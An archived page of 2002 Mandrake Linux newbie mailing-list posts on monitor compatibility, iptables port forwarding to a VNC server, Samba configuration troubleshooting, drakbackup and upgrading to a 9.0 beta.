http://www.unmetered.org.uk/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE9Q85JXzGCRjP1DsMRAnYCAJsGeoLx+K99e8+HjtDx/nw6x4/Q8wCfc9Mp
x3rFLElPf2Q6zwWJD2YEJ6I=
=1ung
-END PGP SIGNATURE-




Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re[2]: [newbie] MD compatible monitors

2002-07-28 Thread Roman Korcek

>> >I'm looking at a Samsung 96 BDF 19" screen
>> >Res 1600x 1200
>> >refresh 65Hz
>> >dp .20mm
>> >for $190
>> >
>> >Anyone know anything about it?

>> Also, its not listed on the Samsung USA site or the rest of the site
>> even under obsolete models!

> Sorry, actually its a Samitron, which is a division of samsung I
> guess.  It's in a samsung box.

That'd be Samtron (not Samitron), just in case someone wants to look
it up.

--
Bye
Roman




Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] MD compatible monitors

2002-07-28 Thread John Richard Smith

Dennis Myers wrote:

>On Saturday 27 July 2002 05:12 pm, Scott wrote:
>  
>
>>On Saturday 27 July 2002 03:43 pm, you wrote:
>>
>>
>>>Scott wrote:
>>>  
>>>
On Saturday 27 July 2002 12:45 pm, you wrote:


>In message <[EMAIL PROTECTED]>, Scott
><[EMAIL PROTECTED]> writes
>
>  
>
>>In mandrake's compatible hardware database they do not list monitors.
>>Is this because compatibility is not generally an issue with
>>monitors? Any brand will work?
>>
>>I'm looking at a Samsung 96 BDF 19" screen
>>Res 1600x 1200
>>refresh 65Hz
>>dp .20mm
>>for $190
>>
>>Anyone know anything about it?
>>Thanks,
>>SW
>>
>>Want to buy your Pack or Services from MandrakeSoft?
>>Go to http://www.mandrakestore.com
>>
>>
>Sounds great apart from that refresh rate which would give me a
>headache.
>
>If its available to view instore - check it out at different refresh
>rates/resolution to see if you are comfortable with it or regret it
>later.
>
>Also, its not listed on the Samsung USA site or the rest of the site
>even under obsolete models!
>
>HTH
>  
>
Sorry, actually its a Samitron, which is a division of samsung I guess.
It's in a samsung box.




Want to buy your Pack or Services from MandrakeSoft?
Go to http://www.mandrakestore.com


>>>I am looking at the 65Hz refresh rate and thinking it is one of the old
>>>fixed-frequency monitors which is unlikely to work with most of today's
>>>video cards and is not worth any price unless you have the specific
>>>hardware to run it or are very capable in the soldering department.
>>>
>>>IF you get by the hardware issues, then Mandrake's generic monitor will
>>>still need a modeline adjustment to put the timing loops on the fixed
>>>frequency.
>>>
>>>Civileme
>>>  
>>>
>>I just downloaded a brochre that has more info.  It says the recommended
>>resolution is 1,064 x 768 @85Hz
>>The scanning frequency is listed at
>>Horizontal 3085KHz
>>Vertical 50-160Hz
>>Does this mean it's OK?
>>Thanks,
>>SW
>>
>>
>
>That's probably 30-85 KHz for horizontal and all of the above should be ok as 
>that is about where my IIyama monitor runs. I like the 1064x768 resolution as 
>it fits the screen nicely but doesn't over work the video card. Also just as 
>an aside, at 60hz if you have florecent lights, screen flicker can be a bear 
>cuz the household electrical is running on 60hz (United States electrical) 
>and you can get a strobe effect.  Just  a tidbit of info incase anyone did 
>not already know.  HTH
>
>  
>
But no strobe effect in UK

John

-- 
John Richard Smith
[EMAIL PROTECTED] 






Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] Hows this for an idea for Mandrake.

2002-07-28 Thread Derek Jennings

On Sunday 28 Jul 2002 10:15 am, frankie wrote:
> Hi guys,
>
> We know that its always better to install rather then upgrade,
>
> But I get really sick of reinstalling endlessly to get the latest stuff..
> and I was thinking about that.
>
> Wouldn't it be a fantastic thing if Mandrake created an "Export system &
> user Settings" drake tool.???
>
>
> and a drake import settings.   this tool would go and collect settings from
> running services, users and security, and you could save the config to a
> floppy, wipe the drive, reinstall and insert the floppy and run the import
> drake, which sets it all up for you again.. (that way you get to have the
> latest config files, rather then keeping files like smb.conf and putting it
> in the next version..)
>
>
> what do you guys thing? is that a good idea or what?
>
>
>
> rgds
>
> Frank

Well there is already the little known drakbackup tool. It will save your /etc 
and /home in incremental backups to a file system, or nfs, or ftp

It works pretty well apart from the daemon mode which has a bug.
It is on the drakxtools RPM

Having never had to use it to do a restore, I am not sure it could selectively 
restore an individual config file, but being written in a scripting language, 
it would not be difficult to add functionality to it.

derek



Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



RE: [newbie] ip forwarding(?) with iptables......

2002-07-28 Thread frankie

try gShield (look it up in google..)

It does port forwarding from scratch, and the save site has a perl script
that generates IPTABLES rules for you..

you just run the script passed with the ingoing IP and port, and the
outgoing IP and port, and it will give you a rule for it..

very handy..


rgds

Franki

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]]On Behalf Of William H Gates
Sent: Sunday, July 28, 2002 6:20 PM
To: [EMAIL PROTECTED]
Subject: Re: [newbie] ip forwarding(?) with iptables..


There are some things on the market to help with IPTables:

Mason:
http://dhp.com/~whisper/mason/

or

Fbuilder Plus
http://www.icewalkers.com/softlib/app/app_01535.html

Anybody ever used these and know if they are any good?
J

On Friday 26 Jul 2002 10:11 pm, you wrote:
> Hello all,
>
> I currently have Mandrake 8.2 installed and configured to act as a
> masquerade gateway and firewall for a small network at our office.
>
> All the PCs on the ethernet are running windoz 98.
>
> I need to set up some type of port forwarding so that a connection can be
> made
> from the internet to the Mandrake firewall and then is redirected to one
of
> the windoze machines. The specific machine has an ip addy of 192.168.0.101
> and
> the mandrake machine is at 192.168.0.1. The Internet address is assigned
> dynamically on interface ppp0. The specific program that i need access to
> on the windows machine is the VNC server which i think listens on port
> 5500.
>
> What rules do i need to add to the firewall to do this? The current
> firewall was set up and configured with Interactive Bastille with the only
> ports being open to the internet interface being 80 for apache and ssh.
>
> My thoughts were that the easy way would be to have the mandrake firewall
> listen for connection attempts on the same port that VNC runs on and then
> have
> the firewall forward the connection attempt to the VNC server running on
> the windoze machine to handle authentication. Is this possible and what
> rule do i need to add to where (rc.firewall?) to accomplish this?
>
> Thanks much,
> Ian K. Harrell
> [EMAIL PROTECTED]

--
Sent using Kmail. Virus free because its nothing to do with Microsoft





Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] ip forwarding(?) with iptables......

2002-07-28 Thread William H Gates

There are some things on the market to help with IPTables:

Mason:
http://dhp.com/~whisper/mason/

or

Fbuilder Plus
http://www.icewalkers.com/softlib/app/app_01535.html

Anybody ever used these and know if they are any good?
J

On Friday 26 Jul 2002 10:11 pm, you wrote:
> Hello all,
>
> I currently have Mandrake 8.2 installed and configured to act as a
> masquerade gateway and firewall for a small network at our office.
>
> All the PCs on the ethernet are running windoz 98.
>
> I need to set up some type of port forwarding so that a connection can be
> made
> from the internet to the Mandrake firewall and then is redirected to one of
> the windoze machines. The specific machine has an ip addy of 192.168.0.101
> and
> the mandrake machine is at 192.168.0.1. The Internet address is assigned
> dynamically on interface ppp0. The specific program that i need access to
> on the windows machine is the VNC server which i think listens on port
> 5500.
>
> What rules do i need to add to the firewall to do this? The current
> firewall was set up and configured with Interactive Bastille with the only
> ports being open to the internet interface being 80 for apache and ssh.
>
> My thoughts were that the easy way would be to have the mandrake firewall
> listen for connection attempts on the same port that VNC runs on and then
> have
> the firewall forward the connection attempt to the VNC server running on
> the windoze machine to handle authentication. Is this possible and what
> rule do i need to add to where (rc.firewall?) to accomplish this?
>
> Thanks much,
> Ian K. Harrell
> [EMAIL PROTECTED]

-- 
Sent using Kmail. Virus free because its nothing to do with Microsoft



Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] Network Problems Re-Stated

2002-07-28 Thread Anne Wilson

On Saturday 27 Jul 2002 1:51 pm, you wrote:
> On Saturday 27 Jul 2002 1:28 pm, C.Anne Wilson wrote:
> > Unfortunately the improvement was *very* shortlived.  I downloaded a
> > file for
> > use elsewhere, started to copy it to FD, it crashed and was
> > unrecoverable.
> >
> > New start, then.   I've re-installed, and have things almost back to
> > where they were.
> >
> > Win98 clients can see my shared directories.
> >
> > [homes] is not working properly:
> >If I enable File & print Sharing for Windows Networks
> >  Clients can see each other
> >  and the server
> >  and a folder marked \\username
> >
> >  Opening this folder shows an apparently empty folder which
> > cannot be written
> > to.
> >
> >If I remove F & P Sharing etc..
> >  Clients can see each other
> >  and the server
> >  and a folder marked \\username
> >
> >  Attempting to open this folder fails, citing unknown error.
> >
> > log.nmbd has this message:
> >
> > [2002/07/27 13:20:42, 0]
> > nmbd/nmbd_browsesync.c:find_domain_master_name_query_fail(359)
> >find_domain_master_name_query_fail:
> >Unable to find the Domain Master Browser name LYDGATE.NET<1b> for the
> > workgroup LYDGATE.NET.
> >Unable to sync browse lists in this workgroup.
> >
> > I presume that I have missed something that is making this fail.  Any
> > pointers, please?
> >
> > I'm now certain that the slowdowns I have experienced are connected with
> > the
> > network problems.  When I re-installed everything was a slick as you
> > could want, but the moment I wrote the smb.conf and hosts files I was
> > back to 20 sec. open times.
> >
> > Annene
>
> Can we see your smb.conf file please Anne.
>
> Also how are you connecting the network physically?  Gateway, firewall etc.
>
> Thanks
>
> derek

Connection - Cat45 cabling through hub, no firewall yet, this machine is 
gateway for Win98 m/cs internet connection sharing.

smb.conf:
[global]
smb passwd file = /etc/samba/smbpasswd
printing = cups
dns proxy = no
encrypt passwords = yes
socket options = TCP_NODELAY SO_RCVBUF=8192 SO_SNDBUF=8192
wins support = true
printcap name = lpstat
max log size = 50
security = user
server string = Samba Server %v
workgroup = lydgate.net
local master = yes
netbios name = anne-linux
log file = /var/log/samba/log.%m
load printers = yes
os level = 33

[homes]
writable = yes
valid users = anne,Micky,Andy,Gillian,Guest
comment = Home Directories
browseable = no
*   public = yes
*   guest ok = yes

[printers]
comment = All Printers
path = /var/spool/samba
browseable = no
# to allow user 'guest account' to print.
guest ok = yes
writable = no
printable = yes
create mode = 0700
# =
# print command: see above for details.
# =
print command = lpr-cups -P %p -o raw %s -r
#   using client side printer drivers.
;   print command = lpr-cups -P %p %s # using cups own drivers (use generic
# PostScript on clients).
# The following two commands are the samba defaults for printing=cups
# change them only if you need different options:
;   lpq command = lpq -P %p
;   lprm command = cancel %p-%j

[print$]
path = /var/lib/samba/printers
browseable = yes
read only = yes
write list = @adm root

[Anne_Public]
path = /mnt/win_d2/Public
browsable = yes
writable = yes
public = yes
create mask = 0775
#   guest ok = yes


[Zips]
path = /mnt/win_c/Zips & Downloads
browsable = yes
writable = yes
public = yes
user = Andy,Gillian,Micky,Nigel
create mask = 0775
#   guest ok = yes

[KAV_Bases]
path = /mnt/win_c/Program Files/Common Files/AVP Shared Files/Bases
writable = no
browsable = yes
public = yes
create mask = 0775
#   guest ok = yes

[MP3]
path = /home/anne/Desktop/Mp3
comment = /home/anne/Desktop/Mp3
public = yes
#   guest ok = yes
writable = yes

The two starred lines were added yesterday (by Webmin) when I tried to check 
if they were not connecting as themselves - a silly idea, really, because I 
had already disabled guest access to the public directories, and they can see 
them OK.

Anne




Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



[newbie] Alpha port.

2002-07-28 Thread William H Gates

Hi

I have an Alpha server that I am having to run RedHat on.

But I prefer Mandrake and there was talk of there being a port developed for 
these machines.

Anybody on here know whether its likely to ever happen or whether its been 
canned or what?

J

-- 
Sent using Kmail. Virus free because its nothing to do with Microsoft



Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



[newbie] Hows this for an idea for Mandrake.

2002-07-28 Thread frankie


Hi guys,

We know that its always better to install rather then upgrade,

But I get really sick of reinstalling endlessly to get the latest stuff..
and I was thinking about that.

Wouldn't it be a fantastic thing if Mandrake created an "Export system &
user Settings" drake tool.???


and a drake import settings.   this tool would go and collect settings from
running services, users and security, and you could save the config to a
floppy, wipe the drive, reinstall and insert the floppy and run the import
drake, which sets it all up for you again.. (that way you get to have the
latest config files, rather then keeping files like smb.conf and putting it
in the next version..)


what do you guys thing? is that a good idea or what?



rgds

Frank





Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] MD compatible monitors

2002-07-28 Thread Derek Jennings

On Saturday 27 Jul 2002 11:12 pm, Scott wrote:
> On Saturday 27 July 2002 03:43 pm, you wrote:
> > Scott wrote:
> > >On Saturday 27 July 2002 12:45 pm, you wrote:
> > >>In message <[EMAIL PROTECTED]>, Scott
> > >><[EMAIL PROTECTED]> writes
> > >>
> > >>>In mandrake's compatible hardware database they do not list monitors.
> > >>> Is this because compatibility is not generally an issue with
> > >>> monitors? Any brand will work?
> > >>>
> > >>>I'm looking at a Samsung 96 BDF 19" screen
> > >>>Res 1600x 1200
> > >>>refresh 65Hz
> > >>>dp .20mm
> > >>>for $190
> > >>>
> > >>>Anyone know anything about it?
> > >>>Thanks,
> > >>>SW
> > >>>
> > >>>Want to buy your Pack or Services from MandrakeSoft?
> > >>>Go to http://www.mandrakestore.com
> > >>
> > >>Sounds great apart from that refresh rate which would give me a
> > >>headache.
> > >>
> > >>If its available to view instore - check it out at different refresh
> > >>rates/resolution to see if you are comfortable with it or regret it
> > >>later.
> > >>
> > >>Also, its not listed on the Samsung USA site or the rest of the site
> > >>even under obsolete models!
> > >>
> > >>HTH
> > >
> > >Sorry, actually its a Samitron, which is a division of samsung I guess.
> > > It's in a samsung box.
> > >
> > >
> > >
> > >
> > >Want to buy your Pack or Services from MandrakeSoft?
> > >Go to http://www.mandrakestore.com
> >
> > I am looking at the 65Hz refresh rate and thinking it is one of the old
> > fixed-frequency monitors which is unlikely to work with most of today's
> > video cards and is not worth any price unless you have the specific
> > hardware to run it or are very capable in the soldering department.
> >
> > IF you get by the hardware issues, then Mandrake's generic monitor will
> > still need a modeline adjustment to put the timing loops on the fixed
> > frequency.
> >
> > Civileme
>
> I just downloaded a brochre that has more info.  It says the recommended
> resolution is 1,064 x 768 @85Hz
> The scanning frequency is listed at
> Horizontal 3085KHz
> Vertical 50-160Hz
> Does this mean it's OK?
> Thanks,
> SW

Should be fine.  If Mandrake does not recognise the specific model, then just 
accept a 'Generic monitor'  and put those parameters in the "Monitor" section 
of your /etc/X11/XF86Config-4 file.
 
   HorizSync  30-85

VertRefresh 50-160

derek





Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com



Re: [newbie] upgradeing to 9.0 beta

2002-07-28 Thread Alastair Scott

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Sunday 28 Jul 2002 1:45 am, Tom Brinkman wrote:

>I admire your persistence to save the home an' hearth ;)  First, IMO,
> current 9.0 KDE3.0.2 is much better than any of the available 'KDE3.x'
> upgrades for 8.x.  As is Gnome2, so why try'n save the old 8.x shi..
> err I mean stuff ?

The 'stuff' that's moved from old to new is just .rc files and similar 
(kmailrc and so on); there's many hours of configuration in those. Certainly 
not any of the desktop icon themes, for example!

Alastair
- -- 
Alastair Scott (London, United Kingdom)
http://www.unmetered.org.uk/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE9Q51oXzGCRjP1DsMRAiBvAJ42eNJUMSZhFIHiquRI3mr4yiLMYACfYeY9
mnnckG60dF1YCa3HVIHHNPI=
=Juwz
-END PGP SIGNATURE-




Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com